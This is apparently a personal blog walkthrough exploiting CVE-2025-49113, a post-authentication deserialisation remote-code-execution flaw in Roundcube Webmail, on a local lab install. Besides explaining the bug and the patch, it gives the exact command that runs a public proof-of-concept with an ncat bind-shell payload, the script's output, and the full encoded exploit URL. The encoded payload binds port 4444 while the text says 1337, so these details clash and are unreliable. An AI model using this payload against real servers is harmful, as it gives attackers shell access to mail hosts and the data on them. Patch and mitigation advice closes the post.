Who am I?
I’m Chetan Chinchulkar (aka omnipresent), a cybersecurity enthusiast, software developer, and security researcher ranked in the top 2% on TryHackMe. Passionate about ethical hacking, CTFs, and software security, I spend my time breaking and fixing systems.
Lets connect on Twitter

Roundcube is a free and open-source webmail project. It is very feature-rich and available in over eighty languages. Although its built-in features are rich, they can be further expanded through the support of third-party plug-ins.

It mainly requires a web server with PHP support and an SQL server to run. Apache, Nginx, and Lighttpd, among others, can easily satisfy the web server requirements; MySQL, MariaDB, PostgreSQL, SQLite, and many others can satisfy the database requirements. This versatility makes Roundcube a very popular choice for webmail, especially among hosting providers.

Recently, a vulnerability was discovered in Roundcube Webmail; it affects all versions 1.5.x and 1.6.x before 1.5.10 and 1.6.11. This vulnerability allows remote code execution (RCE) by authenticated users; in other words, valid credentials for the webmail are enough for the attacker to execute commands on the host system. This vulnerability has a CVSS 3.x severity score of 9.9, i.e., critical. Roundcube has already released versions 1.5.10 and 1.6.11 and strongly recommends updating.

Serialisation is the process of converting an object, i.e., a class instance in PHP, Java, or Python, into a storable or transmittable format. This process is commonly used for storing objects in files or databases and for sending objects across the network, such as in APIs or cookies.

A deserialisation vulnerability is a security flaw that occurs when an application deserialises untrusted or tampered data. Deserialisation is the process of converting data from a serialised format, such as a byte stream or a string, back into a program object. If this process is done insecurely, an attacker can manipulate the serialised data to execute arbitrary code or even escalate privileges, among other malicious actions.

Kirill Firsov discovered a deserialisation vulnerability in Roundcube Webmail. They shared on their website the line of thought and research that led to discovery; it is an interesting read. The vulnerability is caused by the _from property in the upload.php not being thoroughly checked for safe values before deserialisation.

This vulnerability can be inferred in the commits for version 1.5.10 and for version 1.6.11. Even if you are not familiar with PHP, checking the commit lines and the comments will give you a good idea about how this vulnerability was fixed. In the screenshot below, you can easily infer that the additional lines now check if the URL parameter _from contains any unsafe characters.

This vulnerability allows remote code execution via its insecure deserialisation. The attacker still needs to craft a payload so that its deserialisation leads to the desired outcome

Lets create a user to access the webmail at http://localhost/roundcube.

• Username: user
• Password: password123

Exploit Code

A proof of concept (PoC) exploit code is published by FearsOff on their GitHub repository. The easiest way to follow along would be to download the exploit code using git clone https://github.com/fearsoff-org/CVE-2025-49113.

The CVE-2025-49113.php executes the necessary steps to get the payload of your choice executed on the target server. After retrieving a CSRF token and a session cookie, this PoC PHP script logs in using the provided username and password. The core steps of this script lie in the following:

• Craft a malicious serialised PHP object
• Embed the crafted object in the _from parameter
• Send a POST request to the upload.php endpoint using the malicious _from parameter

The received malicious parameter will be deserialised and executed on the server side.

Executing the Exploit

To run the PoC code, the following arguments need to be used: php CVE-2025-49113.php target_url username password command.

• The target_url should be replaced by Roundcube Webmail’s URL, i.e., http://localhost:8080/roundcube
• The username and password are the valid credentials to access the webmail which we created earlier
• The command is the “payload” that you want to be executed on the target server

Let’s use ncat -lvnp 1337 -e /bin/bash to set a bind shell; this will make it easier to demonstrate the exploit and test whether it executed successfully.

Run this code on terminal:

 php CVE-2025-49113.php http://localhost:8080/roundcube user password123 "ncat -lvnp 1337 -e /bin/bash"

We’ll get output:

### Roundcube d 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]
### Retrieving CSRF token and session cookie...
### Authenticating user: user
### Authentication successful
### Command to be executed: 
ncat -lvnp 1337 -e /bin/bash
### Injecting payload...
### End payload: http://localhost:8080/roundcube/?_from=edit-%21%C7%22%C7%3B%C7i%C7%3A%C70%C7%3B%C7O%C7%3A%C71%C76%C7%3A%C7%22%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%22%C7%3A%C71%C7%3A%C7%7B%C7S%C7%3A%C72%C76%C7%3A%C7%22%C7%5C%C70%C70%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%5C%C70%C70%C7_%C7g%C7p%C7g%C7c%C7o%C7n%C7f%C7%22%C7%3B%C7S%C7%3A%C73%C70%C7%3A%C7%22%C7n%C7c%C7a%C7t%C7+%C7-%C7l%C7v%C7n%C7p%C7+%C74%C74%C74%C74%C7+%C7-%C7e%C7+%C7%2F%C7b%C7i%C7n%C7%2F%C7b%C7a%C7s%C7h%C7%3B%C7%23%C7%22%C7%3B%C7%7D%C7i%C7%3A%C70%C7%3B%C7b%C7%3A%C70%C7%3B%C7%7D%C7%22%C7%3B%C7%7D%C7%7D%C7&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload
### Payload injected successfully
### Executing payload...
### Exploit executed successfully

!! You might have to run the exploit few times before it executes successfully.

Now use the payload

http://localhost:8080/roundcube/?_from=edit-%21%C7%22%C7%3B%C7i%C7%3A%C70%C7%3B%C7O%C7%3A%C71%C76%C7%3A%C7%22%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%22%C7%3A%C71%C7%3A%C7%7B%C7S%C7%3A%C72%C76%C7%3A%C7%22%C7%5C%C70%C70%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%5C%C70%C70%C7_%C7g%C7p%C7g%C7c%C7o%C7n%C7f%C7%22%C7%3B%C7S%C7%3A%C73%C70%C7%3A%C7%22%C7n%C7c%C7a%C7t%C7+%C7-%C7l%C7v%C7n%C7p%C7+%C74%C74%C74%C74%C7+%C7-%C7e%C7+%C7%2F%C7b%C7i%C7n%C7%2F%C7b%C7a%C7s%C7h%C7%3B%C7%23%C7%22%C7%3B%C7%7D%C7i%C7%3A%C70%C7%3B%C7b%C7%3A%C70%C7%3B%C7%7D%C7%22%C7%3B%C7%7D%C7%7D%C7&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

and open in browser while listening on port 1337

Once you open the link you’ll get a connection on nc as shown.

We’re in…

This vulnerability only requires valid webmail credentials and works with default installations. The exploit can be tricky to detect, considering it can easily pass as regular traffic. Considering the severity of the exploit, users running 1.5.x and 1.6.x are recommended to update to 1.5.10 and 1.6.11, respectively. If updating is infeasible for some reason, one mitigation would be to block upload.php.